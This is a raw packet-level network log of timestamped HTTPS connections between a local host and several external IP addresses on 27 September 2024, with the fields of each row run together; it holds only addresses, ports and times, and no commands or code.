                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:03.758641005 CEST44349745159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:03.799216986 CEST49745443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:03.950098991 CEST44349745159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:03.950193882 CEST44349745159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:03.950246096 CEST49745443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:03.950946093 CEST49745443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:03.952409029 CEST49748443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:03.952464104 CEST44349748162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:03.952518940 CEST49748443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:03.952893019 CEST49748443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:03.952907085 CEST44349748162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.283091068 CEST4434974445.112.123.126192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.290846109 CEST49744443192.168.2.845.112.123.126
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.290900946 CEST4434974445.112.123.126192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.292046070 CEST4434974445.112.123.126192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.292114019 CEST49744443192.168.2.845.112.123.126
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.439426899 CEST44349748162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.492882967 CEST49744443192.168.2.845.112.123.126
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.493174076 CEST4434974445.112.123.126192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.493232012 CEST49744443192.168.2.845.112.123.126
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.496901989 CEST49744443192.168.2.845.112.123.126
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.509249926 CEST49748443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.509263992 CEST44349748162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.509676933 CEST49749443192.168.2.8172.67.74.152
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.509692907 CEST44349749172.67.74.152192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.509753942 CEST49749443192.168.2.8172.67.74.152
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.510492086 CEST44349748162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.510504961 CEST44349748162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.510540962 CEST49748443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.510880947 CEST49749443192.168.2.8172.67.74.152
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.510889053 CEST44349749172.67.74.152192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.512689114 CEST49748443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.512758970 CEST44349748162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.513062000 CEST49748443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.513071060 CEST44349748162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.513094902 CEST49748443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.515149117 CEST44349747159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.515552998 CEST49747443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.515558958 CEST44349747159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.516622066 CEST44349747159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.516669035 CEST49747443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.518162012 CEST49747443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.518218040 CEST44349747159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.518286943 CEST49747443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.518291950 CEST44349747159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.555406094 CEST44349748162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.627171993 CEST49748443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.627207041 CEST49747443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.678731918 CEST44349748162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.678867102 CEST44349748162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.678910017 CEST49748443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.681476116 CEST49748443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.684993982 CEST49750443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.685031891 CEST44349750162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.685100079 CEST49750443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.686032057 CEST49750443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.686039925 CEST44349750162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.709528923 CEST44349747159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.709629059 CEST44349747159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.709673882 CEST49747443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.710937023 CEST49747443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.713291883 CEST49751443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.713334084 CEST44349751162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.713406086 CEST49751443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.713947058 CEST49751443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:04.713968039 CEST44349751162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.093039989 CEST44349749172.67.74.152192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.093456984 CEST49749443192.168.2.8172.67.74.152
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.093492985 CEST44349749172.67.74.152192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.094538927 CEST44349749172.67.74.152192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.094593048 CEST49749443192.168.2.8172.67.74.152
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.096227884 CEST49749443192.168.2.8172.67.74.152
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.096312046 CEST44349749172.67.74.152192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.096507072 CEST49749443192.168.2.8172.67.74.152
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.096520901 CEST44349749172.67.74.152192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.144848108 CEST44349750162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.145401955 CEST49750443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.145442009 CEST44349750162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.146478891 CEST44349750162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.146559000 CEST49750443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.148183107 CEST49750443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.148257017 CEST44349750162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.148355961 CEST49750443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.148355961 CEST49750443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.148382902 CEST44349750162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.176914930 CEST44349751162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.177540064 CEST49751443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.177567005 CEST44349751162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.181257963 CEST44349751162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.181312084 CEST49751443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.182678938 CEST49751443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.182749033 CEST44349751162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.182827950 CEST49751443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.182838917 CEST44349751162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.182866096 CEST49751443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.189682007 CEST49750443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.223397970 CEST44349751162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.243736029 CEST44349749172.67.74.152192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.243791103 CEST49749443192.168.2.8172.67.74.152
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.244859934 CEST49749443192.168.2.8172.67.74.152
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.245804071 CEST49752443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.245843887 CEST44349752159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.246001005 CEST49752443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.246517897 CEST49752443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.246527910 CEST44349752159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.330308914 CEST49751443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.384268045 CEST44349750162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.384407997 CEST44349750162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.384458065 CEST49750443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.385094881 CEST49750443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.386199951 CEST49753443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.386249065 CEST44349753162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.386363029 CEST49753443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.386809111 CEST49753443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.386822939 CEST44349753162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.394414902 CEST44349751162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.394526005 CEST44349751162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.394854069 CEST49751443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.395256996 CEST49751443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.396589994 CEST49754443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.396605968 CEST44349754162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.396861076 CEST49754443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.397075891 CEST49754443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.397114038 CEST44349754162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.862793922 CEST44349753162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.863379955 CEST49753443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.863404036 CEST44349753162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.864408016 CEST44349753162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.864501953 CEST49753443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.865668058 CEST49753443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.865734100 CEST44349753162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.865799904 CEST49753443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.865938902 CEST49753443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.865948915 CEST44349753162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.884068012 CEST44349754162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.884619951 CEST49754443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.884633064 CEST44349754162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.885641098 CEST44349754162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.885710001 CEST49754443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.886969090 CEST49754443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.887015104 CEST49754443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.887042046 CEST44349754162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.887092113 CEST49754443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.924079895 CEST49753443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:05.931408882 CEST44349754162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.072431087 CEST44349753162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.072554111 CEST44349753162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.073000908 CEST49753443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.073352098 CEST49753443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.074531078 CEST49755443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.074574947 CEST44349755162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.074664116 CEST49755443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.075041056 CEST49755443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.075051069 CEST44349755162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.082815886 CEST44349754162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.082887888 CEST44349754162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.083008051 CEST49754443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.083008051 CEST49754443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.084722042 CEST49756443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.084747076 CEST44349756162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.084829092 CEST49756443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.085047960 CEST49754443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.085213900 CEST49756443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.085223913 CEST44349756162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.090718031 CEST44349752159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.091078043 CEST49752443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.091089964 CEST44349752159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.095036030 CEST44349752159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.095153093 CEST49752443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.096668959 CEST49752443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.096765041 CEST49752443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.096860886 CEST44349752159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.142855883 CEST49752443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.142883062 CEST44349752159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.189685106 CEST49752443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.292017937 CEST44349752159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.292222023 CEST44349752159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.292576075 CEST49752443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.292745113 CEST49752443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.294094086 CEST49757443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.294154882 CEST44349757162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.294250011 CEST49757443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.294641972 CEST49757443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.294660091 CEST44349757162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.542891026 CEST44349756162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.544573069 CEST49756443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.544600010 CEST44349756162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.548168898 CEST44349756162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.548244953 CEST49756443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.549388885 CEST44349755162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.549865961 CEST49755443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.549901009 CEST44349755162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.550024033 CEST49756443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.550175905 CEST49756443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.550215960 CEST44349756162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.550224066 CEST49756443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.551054955 CEST44349755162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.551140070 CEST49755443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.552283049 CEST49755443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.552360058 CEST44349755162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.552391052 CEST49755443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.552427053 CEST49755443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.552443027 CEST44349755162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.595407009 CEST44349756162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.595936060 CEST49756443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.595947981 CEST44349756162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.595983028 CEST49755443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.642839909 CEST49756443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.733098030 CEST44349756162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.733225107 CEST44349756162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.733549118 CEST49756443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.733964920 CEST49756443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.735121012 CEST49758443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.735173941 CEST44349758162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.735260963 CEST49758443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.735626936 CEST49758443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.735636950 CEST44349755162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.735651970 CEST44349758162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.735771894 CEST44349755162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.735817909 CEST49755443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.736350060 CEST49755443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.737220049 CEST49759443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.737248898 CEST44349759162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.737315893 CEST49759443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.737675905 CEST49759443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.737682104 CEST44349759162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.749985933 CEST44349757162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.750343084 CEST49757443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.750361919 CEST44349757162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.751477003 CEST44349757162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.751543045 CEST49757443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.753010035 CEST49757443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.753079891 CEST44349757162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.753107071 CEST49757443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.753139019 CEST49757443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.753150940 CEST44349757162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.799129009 CEST49757443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.937145948 CEST44349757162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.937314987 CEST44349757162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.937412977 CEST49757443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.938114882 CEST49757443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.939289093 CEST49760443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.939344883 CEST44349760162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.939439058 CEST49760443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.939964056 CEST49760443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:06.939980030 CEST44349760162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:07.200665951 CEST44349759162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:07.201312065 CEST49759443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:07.201328993 CEST44349759162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:07.202558041 CEST44349759162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:07.202645063 CEST49759443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:07.203872919 CEST49759443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:07.203944921 CEST44349759162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:07.203984022 CEST49759443192.168.2.8162.159.136.232
